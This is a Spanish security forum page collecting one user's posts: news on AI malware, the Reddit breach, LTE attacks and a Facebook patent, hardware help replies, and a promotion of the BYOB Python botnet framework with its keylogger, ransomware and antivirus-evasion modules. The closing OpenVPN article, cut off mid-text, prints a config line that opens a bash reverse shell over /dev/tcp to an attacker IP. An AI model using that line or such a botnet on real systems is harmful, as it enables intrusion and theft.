Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - K A I L

Páginas 1 ... 3 4 5 6 7 ... 10

#81

Noticias Informáticas / DeepLocker: Malware avanzado creado con inteligencia artificial

Agosto 09, 2018, 06:16:10 PM

La Inteligencia Artificial (IA) se ha visto como una posible solución para detectar y combatir automáticamente el malware y detener los ciberataques antes de que afecten a cualquier organización.

Sin embargo, también pueden utilizar la misma tecnología para impulsar una nueva generación de malware que puede evadir las mejores defensas de ciberseguridad e infectar una red informática o lanzar un ataque solo cuando la cámara detecta la cara del objetivo.

Para demostrar este escenario, los investigadores de seguridad de IBM Research idearon DeepLocker, una nueva clase de herramienta de ataque "altamente dirigida y evasiva" impulsada por IA ", que oculta su intención maliciosa hasta que llega a una víctima específica.

Según el investigador de IBM, DeepLocker vuela por debajo del radar sin ser detectado y "desata su acción maliciosa tan pronto como el modelo de IA identifica el objetivo a través de indicadores como reconocimiento facial, geolocalización y reconocimiento de voz".

Describiéndolo como el enfoque de "spray and pray" del malware tradicional, los investigadores creen que este tipo de malware sigiloso impulsado por inteligencia artificial es particularmente peligroso porque, podría infectar a millones de sistemas sin ser detectado.

El malware puede ocultar su payload en aplicaciones benignas, como el software de videoconferencia, para evitar ser detectado por la mayoría de los antivirus y escáneres de malware hasta que llegue a víctimas específicas, identificadas a través de indicadores como reconocimiento de voz, reconocimiento facial, geolocalización y otros.

"Lo que es único de DeepLocker es que el uso de la IA hace que las" condiciones de activación "para desbloquear el ataque sean casi imposibles de aplicar ingeniería inversa", explican los investigadores. "La carga útil maliciosa solo se desbloqueará si se alcanza el objetivo deseado".

Para demostrar las capacidades de DeepLocker, los investigadores diseñaron una prueba de concepto, camuflando el famoso ransomware WannaCry en una aplicación de videoconferencia para que no sea detectado por las herramientas de seguridad, incluidos los motores antivirus y las sandboxes.

Con la condición de activación incorporada, DeepLocker no desbloqueó y ejecutó el ransomware en el sistema hasta que reconoció la cara del objetivo, que puede combinarse con las fotos del objetivo disponibles para el público.

"Imagine que esta aplicación de videoconferencia es distribuida y descargada por millones de personas, lo cual es un escenario plausible hoy en día en muchas plataformas públicas. Cuando se lanzó, la aplicación contiene instantáneas de cámara en el modelo IA integrado, pero se comporta normal para todos los usuarios excepto el objetivo deseado ", agregaron los investigadores.

"Cuando la víctima se sienta frente a la computadora y utiliza la aplicación, esta obtiene su cara gracias a la cámara, y la carga maliciosa se ejecutará secretamente, gracias a la cara de la víctima, que fue la clave preprogramada para desbloquearla".

Entonces, todo lo que DeepLocker requiere es su foto, que se puede encontrar fácilmente desde cualquiera de sus perfiles de redes sociales en LinkedIn, Facebook, Twitter, Google+ o Instagram, para dirigirse a usted.

El grupo IBM Research dará a conocer más detalles y una demostración en vivo de la implementación de la prueba de concepto de DeepLocker en la conferencia de seguridad de Black Hat USA.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#82

Python / Construye tu propia botnet [Python]

Agosto 07, 2018, 08:29:23 AM

Que tal Underc0ders, les traigo este proyecto de código abierto que me encontré navegando, nos permite crear nuestra propia botnet haciendo pequeñas modificaciones en el código, el cual esta escrito 100% en Python.

BYOB (Build Your Own Botnet)

Descargo de responsabilidad: Este proyecto debe ser utilizado para pruebas autorizadas o con fines educativos únicamente.

BYOB es un proyecto de código abierto que proporciona un marco para que investigadores y desarrolladores de seguridad construyan y operen un botnet básico para profundizar su comprensión del malware sofisticado que infecta millones de dispositivos cada año y genera botnets modernas, con el fin de mejorar su capacidad para desarrollar contramedidas contra estas amenazas.

Está diseñado para permitir a los desarrolladores implementar fácilmente su propio código y agregar nuevas características interesantes sin tener que escribir desde cero una RAT (herramienta de administración remota) o un C&C (servidor de comando y control).

La clave del RAT es que los códigos / archivos arbitrarios pueden cargarse de forma remota en la memoria desde el C&C y ejecutarse en la máquina de destino sin escribir nada en el disco.

El proyecto cuenta de 4 partes:

Servidor

Código: text

server.py [-h] [-v] [--host HOST] [--port PORT] [--database DATABASE]

Servidor de comando y control con base de datos persistente y consola

Interfaz de usuario basado en consola: Interfaz por consola para controlar las máquinas clientes de forma remota a través de shells reversas.
Base de datos persistente de SQLite: Base de datos liviana que almacena información de identificación de las máquinas clientes, lo que permite que las sesiones de reversas persistan y habiliten el reconocimiento a largo plazo de nuestros clientes.
Arquitectura Cliente-Servidor: Todos los paquetes/módulos python instalados localmente están disponibles automáticamente para que los clientes los importen de forma remota sin tocar el disco, permitiendo a los clientes utilizar módulos que requieren paquetes no instalados en las máquinas de destino.

Cliente

Código: text

client.py [-h] [-v] [--name NAME] [--icon ICON] [--pastebin API] [--encrypt] [--obfuscate] [--compress] [--compile] host port [module [module ...]]

Genere clientes completamente indetectables con cargas útiles escalonadas, importaciones remotas y módulos ilimitados

Importaciones remotas: Importe remotamente paquetes de terceros desde el servidor sin escribirlos en el disco o descargarlos/instalarlos.
No hay nada escrito en el disco: Los clientes nunca escriben nada en el disco, ni siquiera archivos temporales (se realizan cero llamadas al sistema) porque las importaciones remotas permiten que el código arbitrario se cargue dinámicamente en la memoria y se importe directamente en el proceso en ejecución.
Cero Dependencias: El cliente ejecuta solo la biblioteca estándar de Python, importa de forma remota cualquier paquete/módulo no estándar del servidor y puede compilarse con un intérprete de Python independiente en un ejecutable binario portátil formateado para cualquier plataforma/arquitectura, lo que le permite ejecutarse en cualquier cosa, incluso cuando Python mismo falta en el host de destino.
Agregue nuevas funciones con solo 1 clic: Cualquier secuencia de comandos, módulo o paquete de Python que usted copie en el directorio ./byob/modules/ automáticamente se puede importar de forma remota y puede ser utilizado directamente por cada cliente mientras su servidor de comando y control se está ejecutando.
Escriba sus propios módulos: Se proporciona una plantilla de módulo básico en el directorio ./byob/modules/ para que la escritura de sus propios módulos sea un proceso sencillo y sin problemas.
Ejecutar módulos ilimitados sin distender el tamaño del archivo: Utilice importaciones remotas para agregar funciones ilimitadas sin agregar un solo byte al tamaño del archivo del cliente.
Totalmente Actualizable: Cada cliente revisará periódicamente el servidor para buscar nuevo contenido disponible para la importación remota, y actualizará dinámicamente sus recursos en memoria si se ha agregado / eliminado algo.
Plataforma independiente: Todo está escrito en Python (un lenguaje independiente de la plataforma) y los clientes generados pueden compilarse opcionalmente en un ejecutable portátil (Windows) o agruparse en una aplicación independiente (macOS).
Bypass Firewalls: Los clientes se conectan al servidor de comando y control a través de conexiones TCP inversas, lo que evitará la mayoría de los firewalls porque las configuraciones de filtro predeterminadas bloquean principalmente las conexiones entrantes.
Medidas contra los antivirus: Evita ser analizado por antivirus al bloquear procesos con nombres de productos antivirus conocidos.
Encriptar payloads para evitar el análisis: La carga útil del cliente principal se cifra con una clave aleatoria de 256 bits que existe únicamente en la clasificación de carga útil que se genera junto con ella.
Evitar la ingeniería inversa: De forma predeterminada, los clientes cancelarán la ejecución si se detecta una máquina virtual o un entorno limitado.

Módulos

Por el momento existen 11 módulos post-explotación que son remotamente importables por los clientes:

Keylogger (byob.modules.keylogger): Registra las pulsaciones del teclado del usuario y el nombre de Windows ingresado.
Screenshot (byob.modules.screenshot): Toma una captura de pantalla del escritorio del usuario actual.
Webcam (byob.modules.webcam): Visualiza streaming o captura imágenes/videos desde la cámara web.
Ransom (byob.modules.ransom): Cifra archivos y genera una billetera BTC aleatoria para el pago de un rescate.
Outlook (byob.modules.outlook): Lee/busca/sube correos electrónicos del cliente local de Outlook.
Packet Sniffer (byob.modules.packetsniffer): Ejecuta un sniffer de paquetes en la red de host y sube el archivo .pcap.
Persistence (byob.modules.persistence): Establece persistencia en la máquina host usando 5 métodos diferentes.
Phone (byob.modules.phone): Lee/busca/sube mensajes de texto desde el smartphone del cliente.
Escalate Privileges (byob.modules.escalate): Intenta el bypass de UAC para obtener privilegios de administrador no autorizados.
Port Scanner (byob.modules.portscanner): Escanea la red local en busca de otros dispositivos online y puertos abiertos.
Process Control (byob.modules.process): Lista/busca/mata/monitoriza los procesos actualmente en ejecución en el host.

Core

Módulos del framework principal utilizados por el generador y el servidor

Utilities (byob.core.util): Funciones de utilidades varias que son utilizadas por muchos módulos.
Handlers (byob.core.handlers): Handlers para recibir resultados de tareas completadas en clientes.
Security (byob.core.security): Diffie-Hellman IKE y 3 modos de cifrado (AES-256-OCB, AES-256-CBC, XOR-128).
Loaders (byob.core.loaders): Importa de forma remota cualquier paquete/módulo/scripts del servidor.
Payloads (byob.core.payloads): Shell inverso TCP diseñado para importar de forma remota dependencias, paquetes y módulos.
Stagers (byob.core.stagers): Generan payloads de stagers únicos para evitar el análisis y la detección.
Generators (byob.core.generators): Funciones que generan dinámicamente código para el generador de clientes.
Database (byob.core.database): Maneja la interacción entre el servidor de comando y control y la base de datos SQLite.

To Do

Los autores de la herramienta comentan que cualquier contribución es bienvenida así que siéntete libre! De momento tienen identificado lo siguiente por hacer:

Cifrado de las importaciones remotas: Cifrado para los flujos de datos de paquetes/módulos que se importan de forma remota (para mantener la confidencialidad/autenticidad/integridad y evitar cualquier vulnerabilidad remota de ejecución de código derivada de la deserialización).
Tipos de transporte: Agregar soporte para más tipos de transporte (HTTP/S, DNS, etc.).
Mejorar el módulo de teléfono/SMS: Agregar la capacidad de propagación a través de correos electrónicos/mensajes de texto cuando se encuentre una lista de contactos en el host de destino.
Mejorar el módulo de Outlook/Correo electrónico: Agregar la capacidad de difusión a través de correos electrónicos/mensajes de texto cuando se encuentre una lista de contactos en el host de destino.
Mejorar el módulo de Ransom: Agregar métodos para usar una API de intercambio de Bitcoins para generar direcciones de billetera temporales que son exclusivas del host objetivo, hacerlas caducar después de un número determinado de horas sin recibir pago y notificar al servidor C&C cuando se realice el pago o la billetera caduque.
Correción de errores: Corregir cualquier error o problema.

Para acceder al código en GitHub: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Sin más, espero que les guste y puedan realizar sus propias pruebas.

Saludos!
K A I L

#83

Noticias Informáticas / Reddit admite que fueron hackeados y robaron datos de usuarios

Agosto 02, 2018, 09:41:52 AM

Reddit publicó You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login hace unas horas en el que reconocían que un hacker consiguió acceder al sistema de la plataforma y hacerse con los datos de algunos usuarios (incluyendo mensajes privados).

Declaran que ocurrió entre el 14 y el 18 de junio de este año, cuando el hacker consiguió "comprometer las cuentas de algunos empleados" de Reddit. Se dieron cuenta de lo ocurrido el día 19, y hace unas horas lo hicieron público.

Cambia tu contraseña en Reddit y vigila si la utilizabas en otros servicios

El hacker consiguió acceder a una base de datos que contenía información personal de aquellos usuarios de Reddit que crearon su cuenta entre 2005 (año en el que se lanzó el servicio) y 2007.

En su comunicado, Reddit no ha querido ofrecer cifras sobre este hackeo, y aseguran que han enviado emails a los usuarios que podrían haber sido afectados por este hackeo.

Afecta a los usuarios que crearon su cuenta entre 2005 y 2007

Entre los datos a los que consiguieron acceder se encuentran los nombres de usuario, contraseñas, direcciones de correo, claves de cifrado (hash) e incluso los mensajes privados.

En el correo que está enviando a los usuarios, Reddit recomienda cambiar inmediatamente la contraseña. Si, como suele ocurrir, esta contraseña se utilizaba en otros servicios también aconsejan cambiarlo lo antes posible.

También han solicitado a los usuarios que eliminen la autenticación basada en SMS y utilicen una 2FA basada en token (como se puede hacer a través de una app de terceros como Google Authenticator o Authy).

Además, en el comunicado, Reddit recomienda que "eliminen cualquier publicación incriminatorio accesible desde su perfil". Ya sabemos que Reddit es una plataforma gigante, con algunas zonas oscuras que rozan o atraviesan la ilegalidad.

El hackeo no afecta a los usuarios que crearon la cuenta después del 2007, aunque quizás no sea una mala idea cambiar la contraseña de Reddit y evitar males innecesarios.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#84

Dudas y pedidos generales / Re:RT3072

Agosto 02, 2018, 08:40:11 AM

Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Buscando por Internet encontré esta imagen, si te fijas, aparece tu modelo de chipset y soporta modo monitor e inyección de paquetes. No tengo experiencia propia con ese modelo de chipset.

Saludos!
K A I L

#85

Dudas y pedidos generales / Re:Bug bounty y su funcionamiento

Agosto 02, 2018, 07:56:47 AM

Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Puedes leer el siguiente post contiene bastante información sobre los programas de Bug Bounty.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos!
K A I L

#86

Dudas y pedidos generales / Re:Bios no reconoce el HDD

Julio 12, 2018, 11:51:49 PM

Es raro nunca tuve un problema similar. Sacame una duda, en las laptop lenovo hay dos formas de acceder a la BIOS, una usando la opción NOVO y la otra creo que es usando las teclas Fn+F1 o Fn+F2, cuando haces cambios en una se guarda en la otra?

Si puedes enviá imágenes de la BIOS a ver si hay algo raro.

Aqui hay un post para subir imagenes por si necesitas:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos!
K A I L

#87

Dudas y pedidos generales / Re:Bios no reconoce el HDD

Julio 12, 2018, 10:59:31 PM

Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login no entendí bien:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Gracias, Probe el disco por USB y lo reconoce, todos

Pero si el conector esta roto porque me reconoce solamente el disco de fabrica y los otros no?

Es lo que no entiendo.

El disco duro nuevo te lo reconoce por USB en la laptop?

Nose que intentaste hacer antes de realizar el post, prueba lo siguiente:

Desactivar el Legacy Mode y habilitar UEFI.
Desactivar el secure boot.

Saludos!
K A I L

#88

Dudas y pedidos generales / Re:Disco no reconoce la Bios

Julio 12, 2018, 03:40:25 PM

Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Quizás el problema está en el conector SATA del equipo, probaste el disco que decis que se rompio en otra máquina? O por USB en el mismo equipo?

El conector SATA puede estar roto o simplemente desconectado de la placa madre.

Saludos!
K A I L

#89

Noticias Informáticas / Internet seguirá siendo libre: el Parlamento Europeo rechaza la nueva ley

Julio 05, 2018, 09:02:30 AM

El Parlamento Europeo tenía hoy una cita a las 12:00 horas del mediodía para la votación de las negociaciones sobre la directiva de derechos de autor. Sobre la misma, los artículos 11 y 13 han generado una tremenda repercusión por los límites a Internet y la libertad de los internautas. El resultado ha sido negativo para las negociaciones: 318 votos en contra, y otros 278 votos a favor, han concluido con el rechazo a la propuesta de directiva, de tal modo que se tendrá que debatir un nuevo borrador.

Hace aproximadamente dos años que arrancó la elaboración de este borrador sobre la directiva de derechos de autor, en la que se incluían los dos polémicos artículos 11 y 13 que tocaban directamente a Internet y sus usuarios. En ellos se contemplaba la creación de algo parecido al canon AEDE, que terminó siendo tumbado en España por un defecto de forma, y a un nuevo nivel de control sobre las publicaciones de contenido en plataformas online; desde páginas web de información hasta redes sociales. Estos artículos son los que llevaron a una fuerte respuesta de piezas clave de Internet, como Wikipedia, que cerró de forma temporal en señal de protesta.

El Parlamento Europeo vota en contra de las negociaciones tumbando la nueva ley de copyright y obligando a la elaboración de un nuevo borrador

Esta votación no habría supuesto la luz verde para la directiva de derechos de autor propuesta, sino luz verde a las negociaciones sobre la misma. Es decir, que lo que se ha 'tumbado' es el borrador. De nuevo en septiembre, entre los días 10 y 13, se tendrá que debatir al completo. Esto tampoco implica que se modifiquen concretamente los artículos 11 y 13, que es por los que Internet se ha movilizado prácticamente de manera unánime. En cualquier caso, lo que sí implica es que el texto propuesto como directiva de derechos de autor se devuelva a la Comisión de Asuntos Jurídicos del Parlamento Europeo para que se vuelva a debatir un nuevo borrador.

Por lo tanto, septiembre de 2018 será la nueva fecha clave en esta directiva de derechos de autor que, como comentábamos, llevaba dos años aproximadamente tomando forma. Volvemos a un punto de inicio, y lo fundamental sería que se revisen los artículos 11 y 13 teniendo en cuenta la liberta de Internet y sus usuarios.

FUENTE: adsl zone

#90

Debates, Reviews y Opiniones / BitHubLab, una plataforma para buscar proyectos en GitHub, Bitbucket y GitLab

Julio 03, 2018, 11:28:05 AM

Si somos programadores seguro que conocemos las plataformas colaborativas de versionado y alojamiento de proyectos de código abierto como GitHub, Bitbucket y GitLab, y si no somos programadores seguramente hayamos oído hablar de estas esta misma tras la compra, por parte de Microsoft, de la más grande de ellas, GitHub. En estas plataformas podemos encontrar miles de proyectos de código abierto, tanto de pequeños desarrolladores como de gigantes de la tecnología como Microsoft o Google. Sin embargo, al existir tantas plataformas de este estilo puede que tengamos problemas a la hora de intentar localizar un proyecto en concreto. Por suerte, BitHubLab busca acabar con este problema.

BitHubLab es una plataforma gratuita diseñada para que, si tenemos que buscar un proyecto de código abierto en concreto, en lugar de tener que buscarlo en todas estas páginas de proyectos de código abierto una a una podamos localizarlo fácilmente buscando en estas tres páginas a la vez desde esta plataforma.

Cómo funciona BitHubLab

El funcionamiento de esta plataforma no tiene ningún misterio. Para ello, lo primero que haremos será entrar a su página web principal You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Como podemos ver, la página tiene la apariencia típica de un buscador, con su correspondiente cuadro de búsqueda en la parte central y tres botones que nos permitirán elegir en qué plataformas queremos buscar los repositorios de código abierto.

Seleccionamos las plataformas donde vamos a buscar (podemos utilizarlo para buscar fuera de GitHub, por ejemplo, o directamente en todas ellas, según nuestra opinión personal) e introduciremos el término que queremos buscar en el cuadro reservado para ese fin. Al instante podremos ver cómo nos empiezan a aparecer los distintos repositorios que coincidan con dicho término.

Si hacemos clic sobre cualquiera de estos repositorios automáticamente podremos ir al proyecto original de manera que podemos acceder a él, clonarlo o lo que necesitemos, ya esté en GitHub, Bitbucket o en GitLab.

BitHubLab, una plataforma muy útil especialmente ahora que muchos desarrolladores se están llevando sus repositorios fuera de GitHub

Hasta esta misma semana, GitHub era quien contenía la mayoría de los proyectos de código abierto, incluso contaba con proyectos que básicamente tenían una redirección a otro servidor. Sin embargo, desde que se ha dado a conocer la compra de GitHub por parte de Microsoft, son muchos los usuarios que han empezado a llevarse sus proyectos a otras plataformas similares. Por ello, es posible que, a partir de ahora, sea más complicado encontrar repositorios dado que estos están mucho más diversificados entre las distintas plataformas de código ya mencionadas.

La verdad es que la compra de GitHub por parte de Microsoft no va a suponer nada, ni para bien ni para mal, para los desarrolladores que tenían, o aún tienen, sus proyectos publicados en la plataforma. Incluso, a pesar de los temores de muchos, Microsoft no va a ser capaz de acceder a los repositorios privados, igual que tampoco podían acceder los responsables de GitHub, sin el permiso de los administradores del repositorio.

Opinión personal: Excelente herramienta en este momento donde los desarrolladores están migrando entre las distintas plataformas.

Probalo y comentanos: ¿Qué te parece esta web?

Saludos!
K A I L

#91

Noticias Informáticas / Facebook registra una patente para saber qué estamos viendo en la TV

Julio 03, 2018, 08:07:05 AM

Facebook quiere escuchar lo que pasa a tu alrededor. La red social siempre ha negado las recurrentes acusaciones de que utilice el micrófono de tu móvil para espiarnos con su micrófono, pero una nueva patente que les han concedido muestra que están trabajando en un software que les permita hacer algo muy parecido.

La patente se llama "broadcast content view analysis based on ambient audio recording" (análisis de vista de contenido de transmisión basado en la grabación de audio ambiente), y describe un sistema capaz de grabar el sonido ambiente de tu móvil. Lo haría cuando diferentes contenidos como anuncios de televisión emitiesen determinados sonidos inaudibles para el ser humano, pero que los móviles detectarían.

Tal y como describe la patente, nosotros estaríamos tranquilamente viendo la televisión, y esta emitiría esa especie de sonido agudo o imperceptible para nosotros. Sin embargo el móvil sí la detectaría, y como si el "Ok, Google" de Google Assistant se tratase, el software o módulo que tuviéramos en el móvil empezaría a trabajar.

Lo primero que haría este programa sería utilizar el micrófono del móvil para grabar todo lo que está pasando a su alrededor, incluyendo el propio contenido de la retransmisión que lo ha ejecutado. Entonces, la aplicación enviaría esta grabación a los servidores de Facebook incluyendo la hora a la que se grabó y un identificador único para cada dispositivo.

Detrás de todo esto habría un esfuerzo por medir qué anuncios son más efectivos. Aunque Facebook no especifica demasiado bien qué hace con los datos, parece dar a entender que su objetivo principal es el de reconocer e identificar los anuncios que estamos viendo, y saber si lo hemos visto hasta el final o si hemos cambiado rápidamente de canal.

Habrá que ver si Facebook se atreve con ello

En ningún momento Facebook dice en la patente que la intención de esta tecnología sea para espiar u obtener datos personales de los usuarios, sino más bien para saber qué anuncios nos gustan más y poder ofrecernos así únicamente los que nos interesan. En cualquier caso, con todos los problemas que han tenido en los últimos meses habrá que ver si se atreven a llevar adelante esta tecnología patentada.

Aunque se la han otorgado este mes, la patente la solicitaron en el 2016, mucho antes de que el escándalo de Cambridge Analytica hiciera que Zuckerberg tuviera que comparecer ante el Senado estadounidense o el Parlamento de la Unión Europea, y que desde entonces haya estado pidiendo perdón y asegurando que iban a mejorarlo todo.

Por eso mismo, con la que está cayendo y el creciente interés por la privacidad parece difícil que Facebook se vaya a arriesgar a más polémicas implementando este sistema, incluso si dicen la verdad y no es algo para espiarnos. Por lo tanto, no sería ya tanto que fuesen a implementar inmediatamente (y si lo hacen desde luego intentarán que no lo sepamos), sino más bien algo que podrían retomar una vez se hayan tranquilizado las aguas.

FUENTE: xataka

#92

Noticias Informáticas / Investigadores descubren ataques al protocolo de red LTE

Julio 01, 2018, 12:43:16 AM

Si su operador de telefonía móvil ofrece LTE, también conocida como la red 4G, debe tener cuidado ya que su comunicación de red puede ser secuestrada de forma remota.

Un equipo de investigadores ha descubierto algunas debilidades críticas en el ubicuo estándar de dispositivo móvil LTE que podría permitir espiar las redes celulares de los usuarios, modificar el contenido de sus comunicaciones e incluso puede redirigirlas a sitios web maliciosos o de phishing.

LTE, o Long Term Evolution, es el último estándar de telefonía móvil utilizado por miles de millones de personas diseñado para brindar muchas mejoras de seguridad sobre el estándar conocido como Sistema Global para comunicaciones móviles (GSM).

Sin embargo, se han descubierto múltiples fallas de seguridad en los últimos años, que permiten a los atacantes interceptar las comunicaciones del usuario, espiar las llamadas telefónicas de los usuarios y enviar mensajes de texto, enviar falsas alertas de emergencia, falsificar la ubicación del dispositivo y desconectar completamente los dispositivos.

Vulnerabilidades de red 4G LTE

Ahora, los investigadores de seguridad de Ruhr-Universität Bochum y la Universidad de Nueva York Abu Dhabi han desarrollado tres nuevos ataques contra la tecnología LTE que les permitieron mapear la identidad de los usuarios, tomar huellas digitales de los sitios web que visitan y redirigirlos a sitios web maliciosos manipulando las búsquedas de DNS.

Los tres ataques, explicados por los investigadores en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, abusan de la capa de enlace de datos, también conocida como Capa Dos, de la ubicua red LTE.

La capa de enlace de datos se encuentra en la parte superior del canal físico, que mantiene la comunicación inalámbrica entre los usuarios y la red. Es responsable de organizar cómo los usuarios múltiples acceden a los recursos en la red, ayudando a corregir los errores de transmisión y protegiendo los datos a través del cifrado.

De los tres, el mapeo de identidad y la huella dactilar del sitio web desarrollados por los investigadores son ataques pasivos, en los que un espía escucha qué datos están pasando entre las estaciones base y los usuarios finales a través de las ondas del teléfono del objetivo.

Sin embargo, el tercero, el ataque de suplantación DNS, denominado "aLTEr" por el equipo, es un ataque activo, que permite a un atacante realizar ataques intermedios para interceptar las comunicaciones y redirigir a la víctima a un sitio web malicioso utilizando DNS spoofing.

¿Qué es el ataque aLTEr?

Como la capa de enlace de datos de la red LTE está encriptada con AES-CTR pero no está protegida de la integridad, un atacante puede modificar los bits incluso dentro de un paquete de datos cifrados, que luego descifra a un texto plano relacionado.

"El ataque aLTEr explota el hecho de que los datos del usuario LTE están encriptados en modo contador (AES-CTR) pero no protegidos por integridad, lo que nos permite modificar la carga del mensaje: el algoritmo de encriptación es maleable y un adversario puede modificar un texto cifrado en otro texto cifrado que luego descifra un texto plano relacionado ", dijeron los investigadores en su artículo.

En un ataque aLTEr, un atacante pretende ser una torre celular real para la víctima, mientras que al mismo tiempo también pretende ser la víctima de la red real, y luego intercepta las comunicaciones entre la víctima y la red real.

¿Cómo ataca aLTEr las redes 4G LTE?

Como demostración de prueba de concepto, el equipo mostró cómo un atacante activo podría redirigir las solicitudes de DNS (sistema de nombres de dominio) y luego realizar un ataque de suplantación DNS, lo que hace que el dispositivo móvil víctima use un servidor DNS malicioso que finalmente redirecciona a la víctima a un sitio malicioso disfrazado de Hotmail.

El investigador realizó el ataque aLTEr dentro de una red comercial y un teléfono comercial dentro de su entorno de laboratorio. Para evitar inferencias no intencionadas con la red real, el equipo utilizó una caja de blindaje para estabilizar la capa de radio.

Además, configuraron dos servidores, su servidor DNS y un servidor HTTP para simular cómo un atacante puede redirigir las conexiones de red. Puedes ver la demostración de video para ver el ataque aLTEr en acción.

El ataque es peligroso, pero es difícil de realizar en escenarios del mundo real. También requiere equipo (USRP), de aproximadamente 4,000 dolares, para funcionar, algo similar a los receptores IMSI, Stingray o DRTbox, y generalmente funciona dentro de un radio de 1 milla del atacante.

Sin embargo, para una agencia de inteligencia o un atacante hábil con recursos suficientes, abusar del ataque no es trivial.

Las vulnerabilidades de LTE también afectan el próximo estándar 5G

Los ataques anteriores no están restringidos a solo 4G.

Las próximas redes 5G también pueden ser vulnerables a estos ataques, ya que el equipo dijo que aunque 5G admite el cifrado autentificado, la función no es obligatoria, lo que probablemente significa que la mayoría de los operadores no tienen la intención de implementarla, lo que podría hacer que 5G también sea vulnerable.

"El uso de cifrado autenticado evitaría el ataque aLTEr, que se puede lograr a través de la adición de códigos de autenticación de mensajes a los paquetes de los paquetes del usuario", dijeron los investigadores.

"Sin embargo, la especificación 5G actual no requiere esta característica de seguridad como obligatoria, pero la deja como un parámetro de configuración opcional".

¿Que es peor? Los defectos de la red LTE no se pueden reparar de inmediato

Dado que los ataques funcionan al abusar de un defecto de diseño inherente de la red LTE, no se puede reparar, ya que requeriría una revisión completa del protocolo LTE.

Como parte de su revelación responsable, el equipo de cuatro investigadores -David Rupprecht, Katharina Kohls, Thorsten Holz y Christina Pöpper- notificó a la Asociación GSM y al 3GPP (Proyecto de Asociación de Tercera Generación), junto con otras compañías telefónicas, antes de salir a bolsa. sus hallazgos.

En respuesta a los ataques, el grupo 3GPP, que desarrolla estándares para la industria de las telecomunicaciones, dijo que una actualización de la especificación 5G podría ser complicada porque operadores como Verizon y AT & T ya comenzaron a implementar el protocolo 5G.

¿Cómo se puede proteger contra los ataques a la red LTE?

La forma más sencilla de protegerse de tales ataques de red LTE es buscar siempre el dominio HTTPS seguro en la barra de direcciones.

El equipo sugiere dos contramedidas ejemplares para todos los operadores:

1.) Actualice la especificación: todos los operadores deberían unirse para solucionar este problema al actualizar la especificación para usar un protocolo de cifrado con autenticación como AES-GCM o ChaCha20-Poly1305.

Sin embargo, los investigadores creen que esto probablemente no sea factible en la práctica, ya que la implementación de todos los dispositivos debe cambiarse para hacer esto, lo que llevará a un alto esfuerzo financiero y organizacional, y la mayoría de los operadores no se molestarán en hacer eso.

2.) Corregir la configuración de HTTPS: otra solución sería que todos los sitios web adoptaran la política de Seguridad de Transporte Estricta de HTTP (HSTS), que actuaría como una capa adicional de protección, ayudando a evitar la redirección de usuarios a un sitio web malicioso.

El equipo también ha publicado un documento de investigación [You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login] con los detalles técnicos sobre el ataque aLTEr. Los detalles técnicos completos de los ataques se presentarán durante el 2019 IEEE Symposium on Security and Privacy el próximo mes de mayo.

FUENTE: thehackersnews

#93

Noticias Informáticas / ¿Usas OpenVPN? Cuidado al configurarlo, podrías habilitar una shell reversa

Junio 22, 2018, 09:42:16 AM

OpenVPN es un popular programa de VPN de código abierto. Su objetivo es crear una conexión de red segura y cifrada. Es muy útil por ejemplo cuando estamos conectados a una red Wi-Fi abierta en un centro comercial y queremos que nuestros datos viajen de forma segura y evitar así posibles filtraciones o intrusos en nuestro equipo. Esta herramienta está disponible para muchos tipos de dispositivos, incluso en routers.

Por todos es sabido que hay que tener mucho cuidado a la hora de instalar un programa, sea cual sea. Hay que tener siempre presente la fuente. Hay que evitar descargar de sitios de terceros y hacerlo de páginas oficiales. Es la mejor manera de asegurarnos, o al menos tener más garantías, de que se trata de algo legítimo. Hoy hablamos de OpenVPN, un programa muy popular de VPN. Explicamos cómo, simplemente a través de un archivo de configuración, podría habilitar una shell reversa en el equipo donde está instalado. Un problema para el usuario que confíe en ello.

Las configuraciones de OpenVPN pueden ejecutar comandos

Es posible utilizar un archivo de configuración de OpenVPN, en principio inofensivo, para dejar una puerta trasera abierta. Esto permitiría ejecutar comandos una vez se ha realizado una conexión VPN.

Para hacer todo esto, un autor malicioso tendría que añadir unas líneas a un archivo de configuración inofensivo OpenVPN (.opvpn/.ovpn) para hacerlo malévolo. Un archivo de configuración OpenVPN es simplemente un archivo de texto con algunas órdenes en ello:

Código: text

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun

Si el autor quisiera hacer que el archivo de configuración OpenVPN ejecutara un comando añadirían en la linea "script-security 2", que permite al usuario escrituras definidas para ser ejecutadas, y una entrada "up", que contiene el comando que es ejecutado después de que de una conexión ha sido hecha. Como un ejemplo, podemos cambiar nuestro archivo de configuración de modo que esto ejecute un comando como se muestra debajo:

Código: text

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&'"

Cuando este archivo de configuración es usado y después de que una conexión ha sido establecida, OpenVPN ejecutará el comando de abrir una shell inversa al ordenador en 192.168.1.218. Esto permitiría al atacante en aquella dirección IP para ejecutar órdenes sobre el ordenador remoto que controló el archivo de configuración OpenVPN.

En archivos de configuraciones de Windows, se podría habilitar un script de PowerShell.

¿Cómo descubrir archivos de configuración OpenVPN maliciosos?

